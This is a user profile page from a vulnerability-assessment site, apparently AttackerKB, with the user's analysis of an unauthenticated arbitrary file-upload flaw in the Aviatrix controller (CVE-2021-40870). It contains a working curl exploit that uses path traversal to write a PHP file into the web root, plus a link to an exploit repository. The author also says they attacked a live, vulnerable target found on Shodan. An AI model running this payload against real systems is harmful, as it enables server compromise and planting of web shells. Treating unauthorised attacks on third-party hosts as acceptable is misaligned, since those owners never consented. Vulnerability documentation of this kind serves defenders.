JoyGhoshs (2)

Last Login: October 09, 2021
Assessments
1
Score
2

JoyGhoshs's Latest (2) Contributions

Sort by:
Filter by:
1

hey @ccondon-r7 , Yes i have performed active attack against a vulnerable target which i found on shodan by doing little search .

1
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Very High
Common in enterpriseEasy to weaponizeUnauthenticated
Technical Analysis

Description

This Vulnerability allows an attacker to create and store file on the Aviatrix controller. Exploitation phase doesn’t need any user authentication , or doesn’t require any other users interaction , simply can be exploited using curl . Here is one example.

curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'

# after executing the previous command if the target is vulnerable this will create a php file on this path

https://vulnerable.target.com/v1/poc

Attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem .

Or You can Use This Exploit to do the exploition more easily : https://github.com/JoyGhoshs/CVE-2021-40870

Exploitation